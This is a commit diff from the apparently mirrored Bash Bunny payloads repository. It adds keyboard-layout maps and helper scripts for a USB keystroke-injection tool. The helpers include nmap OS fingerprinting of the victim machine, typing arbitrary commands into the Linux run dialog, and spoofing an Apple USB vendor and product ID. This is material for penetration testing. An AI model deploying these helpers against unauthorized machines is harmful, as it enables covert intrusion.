hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

merge upstream

Browse Source
This commit is contained in:
root 2017-12-19 13:29:12 -06:00
commit d978800874
116 changed files with 2409 additions and 4577 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

169
languages/cz.json Normal file
View File

@ -0,0 +1,169 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":" Czech QWERTZ version made by Andrej Šimko",
"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
"__comment":" Special Czech characters like ěščřžýáíéů are not included",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"z":"00,00,1c",
"y":"00,00,1d",
"+":"00,00,1e",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"CTRL-ALT":"05,00,00",
"=":"00,00,2d",
")":"00,00,30",
";":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Z":"02,00,1c",
"Y":"02,00,1d",
"1":"02,00,1e",
"2":"02,00,1f",
"3":"02,00,20",
"4":"02,00,21",
"5":"02,00,22",
"6":"02,00,23",
"7":"02,00,24",
"8":"02,00,25",
"9":"02,00,26",
"0":"02,00,27",
"\\":"05,00,14",
"%":"02,00,2d",
"/":"02,00,2f",
"(":"02,00,30",
"'":"02,00,31",
"\"":"02,00,33",
"!":"02,00,34",
"?":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
"|":"05,00,1a",
"#":"05,00,1b",
"&":"05,00,06",
"@":"05,00,19",
"$":"05,00,33",
"*":"05,00,38",
"{":"05,00,05",
"}":"05,00,11",
"[":"05,00,09",
"]":"05,00,0a",
"~":"05,00,1e",
"^":"05,00,20",
"<":"05,00,36",
">":"05,00,37",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00"
}

177
languages/mx.json Normal file
View File

@ -0,0 +1,177 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":"A = LeftShift + a, { = LeftShift + [",
"__comment":" ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"y":"00,00,1c",
"z":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"0":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"'":"00,00,2d",
"¿":"00,00,2e",
"´":"00,00,2f",
"+":"00,00,30",
"}":"00,00,31",
"ñ":"00,00,33",
"{":"00,00,34",
"|":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"<":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Y":"02,00,1c",
"Z":"02,00,1d",
"!":"02,00,1e",
"\"":"02,00,1f",
"#":"02,00,20",
"$":"02,00,21",
"%":"02,00,22",
"&":"02,00,23",
"/":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
"=":"02,00,27",
"?":"02,00,2d",
"¡":"02,00,2e",
"¨":"02,00,2f",
"*":"02,00,30",
"]":"02,00,31",
"Ñ":"02,00,33",
"[":"02,00,34",
"°":"02,00,35",
";":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
">":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"\\":"05,00,2d",
"~":"05,00,30",
"`":"05,00,31",
"^":"05,00,34",
"¬":"05,00,35",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT":"12,00,00",
"@":"40,00,14"
}

169
languages/sk.json Normal file
View File

@ -0,0 +1,169 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":" Slovak QWERTZ version made by Andrej Šimko",
"__comment":" Note that some special characters use leftCtrl+leftAlt+[key]",
"__comment":" Special Slovak characters like ľščťžýáíéúäô are not included",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"z":"00,00,1c",
"y":"00,00,1d",
"+":"00,00,1e",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"CTRL-ALT":"05,00,00",
"=":"00,00,2d",
";":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Z":"02,00,1c",
"Y":"02,00,1d",
"1":"02,00,1e",
"2":"02,00,1f",
"3":"02,00,20",
"4":"02,00,21",
"5":"02,00,22",
"6":"02,00,23",
"7":"02,00,24",
"8":"02,00,25",
"9":"02,00,26",
"0":"02,00,27",
"\\":"05,00,14",
"%":"02,00,2d",
"/":"02,00,2f",
"(":"02,00,30",
"'":"05,00,13",
")":"02,00,31",
"\"":"02,00,33",
"!":"02,00,34",
"?":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
"|":"05,00,1a",
"#":"05,00,1b",
"&":"05,00,06",
"@":"05,00,19",
"$":"05,00,33",
"*":"05,00,38",
"{":"05,00,05",
"}":"05,00,11",
"[":"05,00,09",
"]":"05,00,0a",
"~":"05,00,1e",
"^":"05,00,20",
"<":"05,00,36",
">":"05,00,37",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00"
}

340
languages/us.json
View File

@ -1,169 +1,173 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":"A = LeftShift + a, { = LeftShift + [",
"__comment":" ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"y":"00,00,1c",
"z":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"0":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"-":"00,00,2d",
"=":"00,00,2e",
"[":"00,00,2f",
"]":"00,00,30",
"\\":"00,00,31",
";":"00,00,33",
"'":"00,00,34",
"`":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"/":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Y":"02,00,1c",
"Z":"02,00,1d",
"!":"02,00,1e",
"@":"02,00,1f",
"#":"02,00,20",
"$":"02,00,21",
"%":"02,00,22",
"^":"02,00,23",
"&":"02,00,24",
"*":"02,00,25",
"(":"02,00,26",
")":"02,00,27",
"_":"02,00,2d",
"+":"02,00,2e",
"{":"02,00,2f",
"}":"02,00,30",
"|":"02,00,31",
":":"02,00,33",
"\"":"02,00,34",
"~":"02,00,35",
"<":"02,00,36",
">":"02,00,37",
"?":"02,00,38",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00"
}
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"@": "02,00,1f",
"3": "00,00,20",
"#": "02,00,20",
"4": "00,00,21",
"$": "02,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"^": "02,00,23",
"7": "00,00,24",
"&": "02,00,24",
"8": "00,00,25",
"*": "02,00,25",
"9": "00,00,26",
"(": "02,00,26",
"0": "00,00,27",
")": "02,00,27",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2d",
"_": "02,00,2d",
"=": "00,00,2e",
"+": "02,00,2e",
"[": "00,00,2f",
"{": "02,00,2f",
"]": "00,00,30",
"}": "02,00,30",
"\\": "00,00,31",
"|": "02,00,31",
";": "00,00,33",
":": "02,00,33",
"'": "00,00,34",
"\"": "02,00,34",
"`": "00,00,35",
"~": "02,00,35",
",": "00,00,36",
"<": "02,00,36",
".": "00,00,37",
">": "02,00,37",
"/": "00,00,38",
"?": "02,00,38",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

40
payloads/extensions/cucumber.sh Normal file → Executable file
View File

@ -1,25 +1,25 @@
#!/bin/bash
function CUCUMBER() {
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
case $1 in
"ENABLE")
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
;;
"DISABLE")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
"PLAID")
echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null
sleep 2
echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null
;;
*)
LED FAIL
exit 1
esac
}
export -f CUCUMBER
export -f CUCUMBER

4
payloads/extensions/ducky_lang.sh
View File

@ -1,8 +1,8 @@
#!/bin/bash
function DUCKY_LANG() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
export DUCKY_LANG="$1"
export DUCKY_LANG="$1"
}
export -f DUCKY_LANG

45
payloads/extensions/get.sh
View File

@ -1,23 +1,32 @@
#!/bin/bash
function GET() {
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
esac
case $1 in
"TARGET_IP")
export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
;;
"TARGET_HOSTNAME")
export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
;;
"HOST_IP")
export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
;;
"SWITCH_POSITION")
[[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return
[[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return
[[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return
export SWITCH_POSITION="invalid"
;;
"TARGET_OS")
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
ScanForOS=$(nmap -Pn -O $TARGET_IP -p1)
[[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP)
[[ $ScanForOS == *"Windows"* ]] && export TARGET_OS='WINDOWS' && return
[[ $ScanForOS == *"Linux"* ]] && export TARGET_OS='LINUX' && return
[[ $ScanForOS == *"Apple"* ]] && export TARGET_OS='MACOS' && return
export TARGET_OS='UNKNOWN'
;;
esac
}
export -f GET
export -f GET

26
payloads/extensions/mac_happy.sh Executable file
View File

@ -0,0 +1,26 @@
#!/bin/bash
#Title: Mac_Happy
# Author: thehappydinoa
# Target: Mac
# Version: 0.1
#
# Makes Mac happy by correctly setting pid and vid
# Use by running mac_happy ATTACKMODE HID <attack modes here>
#
function mac_happy() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE
for i in $*;
do
command=$(echo $command $i)
done
command=$(echo $command VID_0X05AC PID_0X021E)
eval $command
}
export -f mac_happy

10
payloads/extensions/requiretool.sh
View File

@ -8,11 +8,11 @@
# REQUIRETOOL impacket
function REQUIRETOOL() {
[[ -z "$1" ]] && exit 1 # parameter must be set
[[ -z "$1" ]] && exit 1 # parameter must be set
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
if [ ! -d /tools/$1/ ]; then
LED FAIL
exit 1
fi
}
export -f REQUIRETOOL

11
payloads/extensions/run.sh
View File

@ -13,9 +13,9 @@
function RUN() {
local os=$1
shift
[[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set
case "$os" in
WIN)
QUACK GUI r
@ -37,6 +37,13 @@ function RUN() {
QUACK DELAY 500
QUACK ENTER
;;
LINUX)
QUACK ALT F2
QUACK DELAY 500
QUACK STRING "$@"
QUACK DELAY 500
QUACK ENTER
;;
*)
# OS parameter must be one of the above
exit 1

60
payloads/extensions/setkb.sh Normal file → Executable file
View File

@ -7,45 +7,45 @@
# Examples:
# SETKB START (set the keyboard layout to a US keyboard layout)
